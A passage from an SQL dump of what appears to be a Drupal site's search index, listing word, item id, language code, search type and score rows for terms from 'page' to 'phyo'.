('page', 65, 'ja', 'help_search', 7),
('page', 65, 'ko', 'help_search', 7),
('page', 66, 'en', 'help_search', 14),
('page', 66, 'ja', 'help_search', 14),
('page', 67, 'en', 'help_search', 1.82593),
('page', 67, 'ja', 'help_search', 1.82593),
('page', 67, 'ko', 'help_search', 1.82593),
('page', 68, 'en', 'help_search', 10.732),
('page', 68, 'ja', 'help_search', 10.732),
('page', 68, 'ko', 'help_search', 10.732),
('page', 69, 'en', 'help_search', 4.9496),
('page', 69, 'ja', 'help_search', 4.9496),
('page', 69, 'ko', 'help_search', 4.9496),
('page', 70, 'en', 'help_search', 1),
('page', 70, 'ja', 'help_search', 1),
('page', 70, 'ko', 'help_search', 1),
('page', 72, 'en', 'help_search', 8.96587),
('page', 72, 'ja', 'help_search', 8.96587),
('page', 72, 'ko', 'help_search', 8.96587),
('page', 73, 'en', 'help_search', 2),
('page', 73, 'ja', 'help_search', 2),
('page', 73, 'ko', 'help_search', 2),
('page', 74, 'en', 'help_search', 3),
('page', 74, 'ja', 'help_search', 3),
('page', 74, 'ko', 'help_search', 3),
('page', 75, 'en', 'help_search', 3),
('page', 75, 'ja', 'help_search', 3),
('page', 75, 'ko', 'help_search', 3),
('page', 77, 'en', 'help_search', 4),
('page', 77, 'ja', 'help_search', 4),
('page', 77, 'ko', 'help_search', 4),
('page', 79, 'en', 'help_search', 2),
('page', 79, 'ja', 'help_search', 2),
('page', 79, 'ko', 'help_search', 2),
('page', 81, 'en', 'help_search', 5),
('page', 81, 'ja', 'help_search', 5),
('page', 81, 'ko', 'help_search', 5),
('page', 82, 'en', 'help_search', 1),
('page', 82, 'ja', 'help_search', 1),
('page', 82, 'ko', 'help_search', 1),
('page', 83, 'en', 'help_search', 1),
('page', 83, 'ja', 'help_search', 1),
('page', 83, 'ko', 'help_search', 1),
('page', 88, 'en', 'help_search', 5),
('page', 88, 'ja', 'help_search', 5),
('page', 88, 'ko', 'help_search', 5),
('page', 89, 'en', 'help_search', 1),
('page', 89, 'ja', 'help_search', 1),
('page', 89, 'ko', 'help_search', 1),
('page', 90, 'en', 'help_search', 1),
('page', 90, 'ja', 'help_search', 1),
('page', 90, 'ko', 'help_search', 1),
('page', 93, 'en', 'help_search', 7.89608),
('page', 93, 'ja', 'help_search', 7.89608),
('page', 93, 'ko', 'help_search', 7.89608),
('page', 155, 'en', 'node_search', 1),
('pagelevel', 31, 'ja', 'help_search', 1),
('pagelevel', 62, 'en', 'help_search', 1),
('pagelevel', 62, 'ja', 'help_search', 1),
('pagelevel', 62, 'ko', 'help_search', 1),
('pagepath', 50, 'en', 'help_search', 8),
('pagepath', 50, 'ja', 'help_search', 8),
('pagepath', 50, 'ko', 'help_search', 8),
('pager', 7, 'en', 'help_search', 1),
('pager', 7, 'ja', 'help_search', 1),
('pager', 7, 'ko', 'help_search', 1),
('pager', 93, 'en', 'help_search', 3.78332),
('pager', 93, 'ja', 'help_search', 3.78332),
('pager', 93, 'ko', 'help_search', 3.78332),
('pages', 22, 'en', 'help_search', 1),
('pages', 22, 'ja', 'help_search', 1),
('pages', 22, 'ko', 'help_search', 1),
('pages', 29, 'en', 'help_search', 1),
('pages', 29, 'ja', 'help_search', 1),
('pages', 29, 'ko', 'help_search', 1),
('pages', 37, 'en', 'help_search', 1.93838),
('pages', 37, 'ja', 'help_search', 1.93838),
('pages', 37, 'ko', 'help_search', 1.93838),
('pages', 42, 'en', 'help_search', 2),
('pages', 42, 'ja', 'help_search', 2),
('pages', 42, 'ko', 'help_search', 2),
('pages', 43, 'en', 'help_search', 4),
('pages', 43, 'ja', 'help_search', 4),
('pages', 43, 'ko', 'help_search', 4),
('pages', 45, 'en', 'help_search', 12),
('pages', 45, 'ja', 'help_search', 12),
('pages', 45, 'ko', 'help_search', 12),
('pages', 62, 'en', 'help_search', 1),
('pages', 62, 'ja', 'help_search', 1),
('pages', 62, 'ko', 'help_search', 1),
('pages', 65, 'en', 'help_search', 2),
('pages', 65, 'ja', 'help_search', 2),
('pages', 65, 'ko', 'help_search', 2),
('pages', 66, 'en', 'help_search', 42),
('pages', 66, 'ja', 'help_search', 42),
('pages', 67, 'en', 'help_search', 11.2782),
('pages', 67, 'ja', 'help_search', 11.2782),
('pages', 67, 'ko', 'help_search', 11.2782),
('pages', 68, 'en', 'help_search', 29.6242),
('pages', 68, 'ja', 'help_search', 29.6242),
('pages', 68, 'ko', 'help_search', 29.6242),
('pages', 69, 'en', 'help_search', 2),
('pages', 69, 'ja', 'help_search', 2),
('pages', 69, 'ko', 'help_search', 2),
('pages', 72, 'en', 'help_search', 34),
('pages', 72, 'ja', 'help_search', 34),
('pages', 72, 'ko', 'help_search', 34),
('pages', 77, 'en', 'help_search', 4),
('pages', 77, 'ja', 'help_search', 4),
('pages', 77, 'ko', 'help_search', 4),
('pages', 80, 'en', 'help_search', 1.94177),
('pages', 80, 'ja', 'help_search', 1.94177),
('pages', 80, 'ko', 'help_search', 1.94177),
('pages', 81, 'en', 'help_search', 26),
('pages', 81, 'ja', 'help_search', 26),
('pages', 81, 'ko', 'help_search', 26),
('pages', 92, 'en', 'help_search', 5),
('pages', 92, 'ja', 'help_search', 5),
('pages', 92, 'ko', 'help_search', 5),
('paginate', 93, 'en', 'help_search', 0.938382),
('paginate', 93, 'ja', 'help_search', 0.938382),
('paginate', 93, 'ko', 'help_search', 0.938382),
('paid', 31, 'en', 'node_search', 1),
('paid', 140, 'en', 'node_search', 1),
('paing', 85, 'en', 'node_search', 31),
('paing', 85, 'ja', 'node_search', 31),
('paing', 108, 'en', 'node_search', 2),
('paing', 108, 'ja', 'node_search', 2),
('paing', 113, 'en', 'node_search', 2),
('paing', 113, 'ja', 'node_search', 2),
('paing', 130, 'en', 'node_search', 1),
('paing', 130, 'ja', 'node_search', 1),
('paing', 134, 'en', 'node_search', 1),
('paing', 134, 'ja', 'node_search', 1),
('paing', 153, 'en', 'node_search', 1),
('paing', 153, 'ja', 'node_search', 1),
('palu', 125, 'en', 'node_search', 27),
('palu', 125, 'ja', 'node_search', 31),
('pann', 127, 'en', 'node_search', 28),
('pann', 127, 'ja', 'node_search', 31),
('pansodan', 11, 'en', 'node_search', 1),
('pansodan', 11, 'ja', 'node_search', 1),
('paragraph', 28, 'en', 'help_search', 1),
('paragraph', 28, 'ja', 'help_search', 1),
('paragraph', 28, 'ko', 'help_search', 1),
('parameter', 50, 'en', 'help_search', 2),
('parameter', 50, 'ja', 'help_search', 2),
('parameter', 50, 'ko', 'help_search', 2),
('parent', 55, 'en', 'help_search', 4),
('parent', 55, 'ja', 'help_search', 4),
('parent', 55, 'ko', 'help_search', 4),
('parent', 56, 'en', 'help_search', 4),
('parent', 56, 'ja', 'help_search', 4),
('parent', 56, 'ko', 'help_search', 4),
('parents', 80, 'en', 'node_search', 1),
('parents', 87, 'en', 'node_search', 1),
('part', 23, 'en', 'node_search', 1),
('part', 33, 'en', 'help_search', 1),
('part', 33, 'ja', 'help_search', 1),
('part', 33, 'ko', 'help_search', 1),
('part', 38, 'en', 'help_search', 1),
('part', 38, 'ja', 'help_search', 1),
('part', 38, 'ko', 'help_search', 1),
('part', 39, 'en', 'help_search', 1),
('part', 39, 'ja', 'help_search', 1),
('part', 39, 'ko', 'help_search', 1),
('part', 48, 'en', 'help_search', 1),
('part', 48, 'ja', 'help_search', 1),
('part', 48, 'ko', 'help_search', 1),
('part', 65, 'en', 'help_search', 1),
('part', 65, 'ja', 'help_search', 1),
('part', 65, 'ko', 'help_search', 1),
('part', 77, 'en', 'help_search', 1),
('part', 77, 'ja', 'help_search', 1),
('part', 77, 'ko', 'help_search', 1),
('part', 87, 'en', 'help_search', 1),
('part', 87, 'ja', 'help_search', 1),
('part', 87, 'ko', 'help_search', 1),
('participating', 95, 'en', 'node_search', 1),
('particular', 7, 'en', 'help_search', 1),
('particular', 7, 'en', 'node_search', 2),
('particular', 7, 'ja', 'help_search', 1),
('particular', 7, 'ko', 'help_search', 1),
('particular', 7, 'ko', 'node_search', 2),
('particular', 9, 'en', 'help_search', 1),
('particular', 9, 'ja', 'help_search', 1),
('particular', 9, 'ko', 'help_search', 1),
('particular', 10, 'en', 'help_search', 1),
('particular', 10, 'ja', 'help_search', 1),
('particular', 10, 'ko', 'help_search', 1),
('particular', 24, 'en', 'help_search', 1),
('particular', 24, 'ja', 'help_search', 1),
('particular', 24, 'ko', 'help_search', 1),
('particular', 25, 'en', 'help_search', 1),
('particular', 25, 'ja', 'help_search', 1),
('particular', 26, 'en', 'help_search', 1),
('particular', 26, 'ja', 'help_search', 1),
('particular', 26, 'ko', 'help_search', 1),
('particular', 27, 'en', 'help_search', 1),
('particular', 27, 'ja', 'help_search', 1),
('particular', 27, 'ko', 'help_search', 1),
('particular', 28, 'en', 'help_search', 0.824901),
('particular', 28, 'ja', 'help_search', 0.824901),
('particular', 28, 'ko', 'help_search', 0.824901),
('particular', 39, 'en', 'help_search', 1),
('particular', 39, 'ja', 'help_search', 1),
('particular', 39, 'ko', 'help_search', 1),
('particular', 65, 'en', 'help_search', 1),
('particular', 65, 'ja', 'help_search', 1),
('particular', 65, 'ko', 'help_search', 1),
('particular', 68, 'en', 'help_search', 2),
('particular', 68, 'ja', 'help_search', 2),
('particular', 68, 'ko', 'help_search', 2),
('particular', 81, 'en', 'help_search', 1),
('particular', 81, 'ja', 'help_search', 1),
('particular', 81, 'ko', 'help_search', 1),
('particular', 84, 'en', 'help_search', 3),
('particular', 84, 'ja', 'help_search', 3),
('particular', 84, 'ko', 'help_search', 3),
('particular', 85, 'en', 'help_search', 1),
('particular', 85, 'ja', 'help_search', 1),
('particular', 85, 'ko', 'help_search', 1),
('particular', 93, 'en', 'help_search', 1),
('particular', 93, 'ja', 'help_search', 1),
('particular', 93, 'ko', 'help_search', 1),
('partner', 25, 'en', 'node_search', 1),
('partnering', 62, 'en', 'node_search', 1),
('partnership', 66, 'en', 'node_search', 1),
('parts', 37, 'en', 'help_search', 1.84779),
('parts', 37, 'ja', 'help_search', 1.84779),
('parts', 37, 'ko', 'help_search', 1.84779),
('pass', 11, 'en', 'help_search', 0.949597),
('pass', 11, 'ja', 'help_search', 0.949597),
('pass', 11, 'ko', 'help_search', 0.949597),
('pass', 23, 'en', 'node_search', 0.813674),
('pass', 24, 'en', 'node_search', 1),
('pass', 30, 'en', 'node_search', 1),
('pass', 31, 'en', 'node_search', 0.972861),
('pass', 138, 'en', 'node_search', 1),
('passed', 31, 'en', 'node_search', 1),
('passed', 67, 'ja', 'node_search', 1),
('passed', 120, 'en', 'node_search', 49),
('passed', 120, 'ja', 'node_search', 27),
('passed', 136, 'en', 'node_search', 2),
('passed', 140, 'en', 'node_search', 1),
('passed', 160, 'en', 'node_search', 32),
('passed', 161, 'en', 'node_search', 32),
('passed', 166, 'en', 'node_search', 32),
('passed', 168, 'en', 'node_search', 29),
('passed', 170, 'en', 'node_search', 32),
('passed', 178, 'en', 'node_search', 2),
('passed', 179, 'en', 'node_search', 2),
('passed', 180, 'en', 'node_search', 2),
('passed', 181, 'en', 'node_search', 29),
('passed', 182, 'en', 'node_search', 5),
('passed', 183, 'en', 'node_search', 5),
('passed', 185, 'en', 'node_search', 2),
('passed', 186, 'en', 'node_search', 2),
('passed', 187, 'en', 'node_search', 5),
('passed', 188, 'en', 'node_search', 2),
('passed', 189, 'en', 'node_search', 5),
('passed', 190, 'en', 'node_search', 5),
('passed', 191, 'en', 'node_search', 5),
('passed', 192, 'en', 'node_search', 2),
('passed', 193, 'en', 'node_search', 5),
('passed', 194, 'en', 'node_search', 5),
('passed', 195, 'en', 'node_search', 2),
('passed', 196, 'en', 'node_search', 5),
('passed', 197, 'en', 'node_search', 5),
('passed', 198, 'en', 'node_search', 2),
('passed', 199, 'en', 'node_search', 32),
('passing', 31, 'en', 'node_search', 0.882818),
('passing', 70, 'en', 'node_search', 1),
('passing', 71, 'en', 'node_search', 1),
('passing', 72, 'en', 'node_search', 1),
('passing', 74, 'en', 'node_search', 1),
('passing', 75, 'en', 'node_search', 1),
('passing', 81, 'en', 'node_search', 31),
('passing', 81, 'ja', 'node_search', 27),
('passing', 82, 'en', 'node_search', 1),
('passing', 84, 'en', 'node_search', 1),
('passing', 85, 'en', 'node_search', 4),
('passing', 90, 'en', 'node_search', 1),
('passing', 98, 'en', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('passing', 100, 'en', 'node_search', 4),
('passing', 101, 'en', 'node_search', 1),
('passing', 102, 'en', 'node_search', 1),
('passing', 104, 'en', 'node_search', 1),
('passing', 106, 'en', 'node_search', 1),
('passing', 107, 'en', 'node_search', 1),
('passing', 109, 'en', 'node_search', 1),
('passing', 110, 'en', 'node_search', 1),
('passing', 112, 'en', 'node_search', 1),
('passing', 114, 'en', 'node_search', 1),
('passing', 115, 'en', 'node_search', 1),
('passing', 117, 'en', 'node_search', 1),
('passing', 118, 'en', 'node_search', 1),
('passing', 119, 'en', 'node_search', 1),
('passing', 121, 'en', 'node_search', 1),
('passing', 123, 'en', 'node_search', 1),
('passing', 124, 'en', 'node_search', 1),
('passing', 125, 'en', 'node_search', 1),
('passing', 131, 'en', 'node_search', 1),
('passing', 134, 'en', 'node_search', 28),
('passing', 134, 'ja', 'node_search', 27),
('passing', 135, 'en', 'node_search', 1),
('passing', 137, 'en', 'node_search', 1),
('passing', 139, 'en', 'node_search', 1),
('passing', 141, 'en', 'node_search', 1),
('passing', 143, 'en', 'node_search', 1),
('passing', 144, 'en', 'node_search', 1),
('passing', 146, 'en', 'node_search', 26),
('passing', 146, 'ja', 'node_search', 27),
('passing', 149, 'en', 'node_search', 47),
('passing', 178, 'en', 'node_search', 1),
('passing', 180, 'en', 'node_search', 1),
('passing', 181, 'en', 'node_search', 1),
('passing', 186, 'en', 'node_search', 1),
('passing', 192, 'en', 'node_search', 1),
('passing', 198, 'en', 'node_search', 1),
('passport', 24, 'en', 'node_search', 2),
('passports', 5, 'en', 'node_search', 28),
('passports', 5, 'ko', 'node_search', 28),
('passsing', 132, 'en', 'node_search', 1),
('password', 44, 'en', 'help_search', 1),
('password', 44, 'ja', 'help_search', 1),
('password', 44, 'ko', 'help_search', 1),
('password', 82, 'en', 'help_search', 4),
('password', 82, 'ja', 'help_search', 4),
('password', 82, 'ko', 'help_search', 4),
('password', 86, 'en', 'help_search', 2),
('password', 86, 'ja', 'help_search', 2),
('password', 86, 'ko', 'help_search', 2),
('past', 3, 'en', 'node_search', 1),
('past', 3, 'ko', 'node_search', 1),
('past', 7, 'en', 'help_search', 1.79901),
('past', 7, 'ja', 'help_search', 1.79901),
('past', 7, 'ko', 'help_search', 1.79901),
('past', 9, 'en', 'help_search', 2),
('past', 9, 'ja', 'help_search', 2),
('past', 9, 'ko', 'help_search', 2),
('past', 76, 'en', 'help_search', 1),
('past', 76, 'ja', 'help_search', 1),
('past', 76, 'ko', 'help_search', 1),
('paste', 13, 'en', 'help_search', 1),
('paste', 13, 'ja', 'help_search', 1),
('paste', 13, 'ko', 'help_search', 1),
('paste', 15, 'en', 'help_search', 5),
('paste', 15, 'ja', 'help_search', 5),
('paste', 15, 'ko', 'help_search', 5),
('path', 30, 'en', 'help_search', 0.718502),
('path', 30, 'ja', 'help_search', 0.718502),
('path', 30, 'ko', 'help_search', 0.718502),
('path', 50, 'en', 'help_search', 1),
('path', 50, 'ja', 'help_search', 1),
('path', 50, 'ko', 'help_search', 1),
('path', 56, 'en', 'help_search', 1),
('path', 56, 'ja', 'help_search', 1),
('path', 56, 'ko', 'help_search', 1),
('path', 64, 'en', 'help_search', 2),
('path', 64, 'ja', 'help_search', 2),
('path', 64, 'ko', 'help_search', 2),
('path', 65, 'en', 'help_search', 26),
('path', 65, 'ja', 'help_search', 26),
('path', 65, 'ko', 'help_search', 26),
('path', 66, 'en', 'help_search', 4),
('path', 66, 'ja', 'help_search', 4),
('path', 199, 'en', 'node_search', 1),
('pathauto', 65, 'en', 'help_search', 11),
('pathauto', 65, 'ja', 'help_search', 11),
('pathauto', 65, 'ko', 'help_search', 11),
('pathlanguagecenter', 205, 'en', 'node_search', 10),
('pathlanguagecenter', 205, 'ja', 'node_search', 10),
('paths', 65, 'en', 'help_search', 31),
('paths', 65, 'ja', 'help_search', 31),
('paths', 65, 'ko', 'help_search', 31),
('pathways', 183, 'en', 'node_search', 1),
('patient', 162, 'en', 'node_search', 0.909743),
('patterns', 71, 'en', 'help_search', 4),
('patterns', 71, 'ja', 'help_search', 4),
('patterns', 71, 'ko', 'help_search', 4),
('paul', 125, 'en', 'node_search', 1),
('pay', 3, 'en', 'node_search', 0.997306),
('pay', 3, 'ko', 'node_search', 0.989021),
('pay', 5, 'en', 'node_search', 1),
('pay', 5, 'ko', 'node_search', 1),
('paying', 23, 'en', 'node_search', 1),
('paying', 31, 'en', 'node_search', 1),
('paying', 85, 'en', 'help_search', 1),
('paying', 85, 'ja', 'help_search', 1),
('paying', 85, 'ko', 'help_search', 1),
('pencil', 22, 'en', 'help_search', 1),
('pencil', 22, 'ja', 'help_search', 1),
('pencil', 22, 'ko', 'help_search', 1),
('pencil', 39, 'en', 'help_search', 1),
('pencil', 39, 'ja', 'help_search', 1),
('pencil', 39, 'ko', 'help_search', 1),
('pending', 86, 'en', 'help_search', 1),
('pending', 86, 'ja', 'help_search', 1),
('pending', 86, 'ko', 'help_search', 1),
('people', 7, 'en', 'help_search', 1),
('people', 7, 'en', 'node_search', 2),
('people', 7, 'ja', 'help_search', 1),
('people', 7, 'ko', 'help_search', 1),
('people', 7, 'ko', 'node_search', 2),
('people', 8, 'en', 'node_search', 27),
('people', 11, 'en', 'help_search', 0.882818),
('people', 11, 'ja', 'help_search', 0.882818),
('people', 11, 'ko', 'help_search', 0.882818),
('people', 18, 'en', 'help_search', 8),
('people', 18, 'ja', 'help_search', 8),
('people', 18, 'ko', 'help_search', 8),
('people', 19, 'en', 'node_search', 28),
('people', 19, 'ko', 'node_search', 28),
('people', 23, 'en', 'node_search', 0.899454),
('people', 43, 'en', 'help_search', 3.68109),
('people', 43, 'ja', 'help_search', 3.68109),
('people', 43, 'ko', 'help_search', 3.68109),
('people', 82, 'en', 'help_search', 4),
('people', 82, 'ja', 'help_search', 4),
('people', 82, 'ko', 'help_search', 4),
('people', 83, 'en', 'help_search', 4),
('people', 83, 'ja', 'help_search', 4),
('people', 83, 'ko', 'help_search', 4),
('people', 85, 'en', 'help_search', 4),
('people', 85, 'ja', 'help_search', 4),
('people', 85, 'ko', 'help_search', 4),
('people', 86, 'en', 'help_search', 4),
('people', 86, 'ja', 'help_search', 4),
('people', 86, 'ko', 'help_search', 4),
('people', 87, 'en', 'help_search', 4),
('people', 87, 'ja', 'help_search', 4),
('people', 87, 'ko', 'help_search', 4),
('people', 89, 'en', 'help_search', 1),
('people', 89, 'ja', 'help_search', 1),
('people', 89, 'ko', 'help_search', 1),
('people', 162, 'en', 'node_search', 1),
('per', 4, 'en', 'node_search', 1),
('per', 4, 'ja', 'node_search', 1),
('per', 5, 'en', 'node_search', 2),
('per', 5, 'ko', 'node_search', 2),
('per', 7, 'en', 'help_search', 4),
('per', 7, 'ja', 'help_search', 4),
('per', 7, 'ko', 'help_search', 4),
('per', 24, 'en', 'help_search', 1),
('per', 24, 'ja', 'help_search', 1),
('per', 24, 'ko', 'help_search', 1),
('per', 27, 'en', 'help_search', 1),
('per', 27, 'ja', 'help_search', 1),
('per', 27, 'ko', 'help_search', 1),
('per', 31, 'en', 'node_search', 1),
('per', 67, 'en', 'help_search', 4),
('per', 67, 'ja', 'help_search', 4),
('per', 67, 'ko', 'help_search', 4),
('per', 162, 'en', 'node_search', 2.90305),
('percentage', 53, 'en', 'help_search', 1),
('percentage', 53, 'ja', 'help_search', 1),
('percentage', 53, 'ko', 'help_search', 1),
('perfect', 66, 'en', 'node_search', 1),
('perform', 43, 'en', 'help_search', 1),
('perform', 43, 'ja', 'help_search', 1),
('perform', 43, 'ko', 'help_search', 1),
('perform', 67, 'en', 'help_search', 1),
('perform', 67, 'ja', 'help_search', 1),
('perform', 67, 'ko', 'help_search', 1),
('perform', 73, 'en', 'help_search', 2),
('perform', 73, 'ja', 'help_search', 2),
('perform', 73, 'ko', 'help_search', 2),
('perform', 84, 'en', 'help_search', 1),
('perform', 84, 'ja', 'help_search', 1),
('perform', 84, 'ko', 'help_search', 1),
('perform', 89, 'en', 'help_search', 1),
('perform', 89, 'ja', 'help_search', 1),
('perform', 89, 'ko', 'help_search', 1),
('performance', 37, 'en', 'help_search', 70.3599),
('performance', 37, 'ja', 'help_search', 70.3599),
('performance', 37, 'ko', 'help_search', 70.3599),
('performance', 70, 'en', 'help_search', 4),
('performance', 70, 'ja', 'help_search', 4),
('performance', 70, 'ko', 'help_search', 4),
('performing', 33, 'en', 'help_search', 1),
('performing', 33, 'ja', 'help_search', 1),
('performing', 33, 'ko', 'help_search', 1),
('performing', 34, 'en', 'help_search', 1),
('performing', 34, 'ja', 'help_search', 1),
('performing', 34, 'ko', 'help_search', 1),
('performing', 68, 'en', 'help_search', 0.886095),
('performing', 68, 'ja', 'help_search', 0.886095),
('performing', 68, 'ko', 'help_search', 0.886095),
('period', 150, 'en', 'node_search', 1),
('period', 191, 'en', 'node_search', 1),
('periodically', 32, 'en', 'help_search', 3),
('periodically', 32, 'ja', 'help_search', 3),
('periodically', 32, 'ko', 'help_search', 3),
('periodically', 34, 'en', 'help_search', 1),
('periodically', 34, 'ja', 'help_search', 1),
('periodically', 34, 'ko', 'help_search', 1),
('permanent', 66, 'en', 'help_search', 1),
('permanent', 66, 'ja', 'help_search', 1),
('permission', 7, 'en', 'help_search', 4),
('permission', 7, 'ja', 'help_search', 4),
('permission', 7, 'ko', 'help_search', 4),
('permission', 8, 'en', 'help_search', 1),
('permission', 8, 'ja', 'help_search', 1),
('permission', 8, 'ko', 'help_search', 1),
('permission', 9, 'en', 'help_search', 2),
('permission', 9, 'ja', 'help_search', 2),
('permission', 9, 'ko', 'help_search', 2),
('permission', 10, 'en', 'help_search', 2),
('permission', 10, 'ja', 'help_search', 2),
('permission', 10, 'ko', 'help_search', 2),
('permission', 22, 'en', 'help_search', 3),
('permission', 22, 'ja', 'help_search', 3),
('permission', 22, 'ko', 'help_search', 3),
('permission', 39, 'en', 'help_search', 2),
('permission', 39, 'ja', 'help_search', 2),
('permission', 39, 'ko', 'help_search', 2),
('permission', 46, 'en', 'help_search', 0.968904),
('permission', 46, 'ja', 'help_search', 0.968904),
('permission', 46, 'ko', 'help_search', 0.968904),
('permission', 59, 'en', 'help_search', 5),
('permission', 59, 'ja', 'help_search', 5),
('permission', 59, 'ko', 'help_search', 5),
('permission', 60, 'en', 'help_search', 1),
('permission', 60, 'ja', 'help_search', 1),
('permission', 60, 'ko', 'help_search', 1),
('permission', 61, 'en', 'help_search', 5),
('permission', 61, 'ja', 'help_search', 5),
('permission', 61, 'ko', 'help_search', 5),
('permission', 62, 'en', 'help_search', 1),
('permission', 62, 'ja', 'help_search', 1),
('permission', 62, 'ko', 'help_search', 1),
('permission', 63, 'en', 'help_search', 2),
('permission', 63, 'ja', 'help_search', 2),
('permission', 63, 'ko', 'help_search', 2),
('permission', 64, 'en', 'help_search', 1),
('permission', 64, 'ja', 'help_search', 1),
('permission', 64, 'ko', 'help_search', 1),
('permission', 68, 'en', 'help_search', 4.55671),
('permission', 68, 'ja', 'help_search', 4.55671),
('permission', 68, 'ko', 'help_search', 4.55671),
('permission', 69, 'en', 'help_search', 5),
('permission', 69, 'ja', 'help_search', 5),
('permission', 69, 'ko', 'help_search', 5),
('permission', 73, 'en', 'help_search', 1),
('permission', 73, 'ja', 'help_search', 1),
('permission', 73, 'ko', 'help_search', 1),
('permission', 79, 'en', 'help_search', 2),
('permission', 79, 'ja', 'help_search', 2),
('permission', 79, 'ko', 'help_search', 2),
('permission', 81, 'en', 'help_search', 2),
('permission', 81, 'ja', 'help_search', 2),
('permission', 81, 'ko', 'help_search', 2),
('permission', 84, 'en', 'help_search', 23),
('permission', 84, 'ja', 'help_search', 23),
('permission', 84, 'ko', 'help_search', 23),
('permission', 85, 'en', 'help_search', 5),
('permission', 85, 'ja', 'help_search', 5),
('permission', 85, 'ko', 'help_search', 5),
('permission', 86, 'en', 'help_search', 1),
('permission', 86, 'ja', 'help_search', 1),
('permission', 86, 'ko', 'help_search', 1),
('permission', 89, 'en', 'help_search', 2.99731),
('permission', 89, 'ja', 'help_search', 2.99315),
('permission', 89, 'ko', 'help_search', 2.99731),
('permission', 93, 'en', 'help_search', 1.85135),
('permission', 93, 'ja', 'help_search', 1.85135),
('permission', 93, 'ko', 'help_search', 1.85135),
('permissions', 11, 'en', 'help_search', 1.90974),
('permissions', 11, 'ja', 'help_search', 1.90974),
('permissions', 11, 'ko', 'help_search', 1.90974),
('permissions', 18, 'en', 'help_search', 9),
('permissions', 18, 'ja', 'help_search', 9),
('permissions', 18, 'ko', 'help_search', 9),
('permissions', 20, 'en', 'help_search', 1),
('permissions', 20, 'ja', 'help_search', 1),
('permissions', 20, 'ko', 'help_search', 1),
('permissions', 28, 'en', 'help_search', 1),
('permissions', 28, 'ja', 'help_search', 1),
('permissions', 28, 'ko', 'help_search', 1),
('permissions', 38, 'en', 'help_search', 11),
('permissions', 38, 'ja', 'help_search', 11),
('permissions', 38, 'ko', 'help_search', 11),
('permissions', 43, 'en', 'help_search', 1.90974),
('permissions', 43, 'ja', 'help_search', 1.90974),
('permissions', 43, 'ko', 'help_search', 1.90974),
('permissions', 46, 'en', 'help_search', 0.972861),
('permissions', 46, 'ja', 'help_search', 0.972861),
('permissions', 46, 'ko', 'help_search', 0.972861),
('permissions', 59, 'en', 'help_search', 1),
('permissions', 59, 'ja', 'help_search', 1),
('permissions', 59, 'ko', 'help_search', 1),
('permissions', 61, 'en', 'help_search', 1),
('permissions', 61, 'ja', 'help_search', 1),
('permissions', 61, 'ko', 'help_search', 1),
('permissions', 68, 'en', 'help_search', 19.4502),
('permissions', 68, 'ja', 'help_search', 19.4502),
('permissions', 68, 'ko', 'help_search', 19.4502),
('permissions', 84, 'en', 'help_search', 1),
('permissions', 84, 'ja', 'help_search', 1),
('permissions', 84, 'ko', 'help_search', 1),
('permissions', 85, 'en', 'help_search', 39),
('permissions', 85, 'ja', 'help_search', 39),
('permissions', 85, 'ko', 'help_search', 39),
('permissions', 89, 'en', 'help_search', 1),
('permissions', 89, 'ja', 'help_search', 1),
('permissions', 89, 'ko', 'help_search', 1),
('permit', 27, 'en', 'node_search', 2.00364),
('permit', 30, 'en', 'node_search', 1),
('permits', 23, 'en', 'node_search', 1),
('perseverance', 166, 'en', 'node_search', 1),
('perseverance', 180, 'en', 'node_search', 1),
('perseverance', 181, 'en', 'node_search', 1),
('perseverance', 196, 'en', 'node_search', 1),
('persistence', 192, 'en', 'node_search', 28),
('person', 29, 'en', 'node_search', 28),
('person', 68, 'en', 'node_search', 1),
('person', 68, 'ja', 'node_search', 1),
('person', 69, 'en', 'node_search', 1),
('personal', 17, 'en', 'help_search', 2),
('personal', 17, 'ja', 'help_search', 2),
('personal', 17, 'ko', 'help_search', 2),
('personal', 18, 'en', 'help_search', 32),
('personal', 18, 'ja', 'help_search', 32),
('personal', 18, 'ko', 'help_search', 32),
('personal', 20, 'en', 'help_search', 24),
('personal', 20, 'ja', 'help_search', 24),
('personal', 20, 'ko', 'help_search', 24),
('personal', 23, 'en', 'node_search', 0.824901),
('personal', 162, 'en', 'node_search', 1),
('personal', 165, 'en', 'node_search', 1),
('personal', 169, 'en', 'node_search', 1),
('personal', 171, 'en', 'node_search', 1),
('personal', 174, 'en', 'node_search', 1),
('personal', 182, 'en', 'node_search', 1),
('personal', 191, 'en', 'node_search', 2),
('personality', 162, 'en', 'node_search', 0.902857),
('personalized', 37, 'en', 'help_search', 0.920273),
('personalized', 37, 'ja', 'help_search', 0.920273),
('personalized', 37, 'ko', 'help_search', 0.920273),
('personally', 171, 'en', 'node_search', 1),
('personally', 197, 'en', 'node_search', 1),
('peson', 134, 'en', 'node_search', 27),
('peson', 134, 'ja', 'node_search', 27),
('phd', 62, 'en', 'node_search', 1),
('phone', 11, 'en', 'node_search', 1),
('phone', 11, 'ja', 'node_search', 1),
('phone', 62, 'en', 'node_search', 0.805455),
('phone', 62, 'ja', 'node_search', 0.475426),
('phoo', 167, 'en', 'node_search', 1),
('phoo', 167, 'ja', 'node_search', 1),
('phoo', 173, 'en', 'node_search', 1),
('phoo', 173, 'ja', 'node_search', 1),
('photo', 20, 'en', 'node_search', 28),
('photo', 20, 'ko', 'node_search', 28),
('php', 33, 'en', 'help_search', 1),
('php', 33, 'ja', 'help_search', 1),
('php', 33, 'ko', 'help_search', 1),
('php', 71, 'en', 'help_search', 12),
('php', 71, 'ja', 'help_search', 12),
('php', 71, 'ko', 'help_search', 12),
('php', 72, 'en', 'help_search', 1),
('php', 72, 'ja', 'help_search', 1),
('php', 72, 'ko', 'help_search', 1),
('phray', 103, 'en', 'node_search', 2),
('phray', 103, 'ja', 'node_search', 2),
('phray', 137, 'en', 'node_search', 28),
('phray', 137, 'ja', 'node_search', 28),
('phyo', 93, 'en', 'node_search', 2),
('phyo', 93, 'ja', 'node_search', 2),
('phyo', 101, 'en', 'node_search', 28),
('phyo', 101, 'ja', 'node_search', 31),
('phyo', 108, 'en', 'node_search', 2),
('phyo', 108, 'ja', 'node_search', 2),
('phyo', 113, 'en', 'node_search', 2),
('phyo', 113, 'ja', 'node_search', 2),
('phyo', 123, 'en', 'node_search', 28),
('phyo', 123, 'ja', 'node_search', 31),
('phyo', 127, 'en', 'node_search', 28),
('phyo', 127, 'ja', 'node_search', 31),
('phyo', 134, 'en', 'node_search', 1),
('phyo', 134, 'ja', 'node_search', 1),
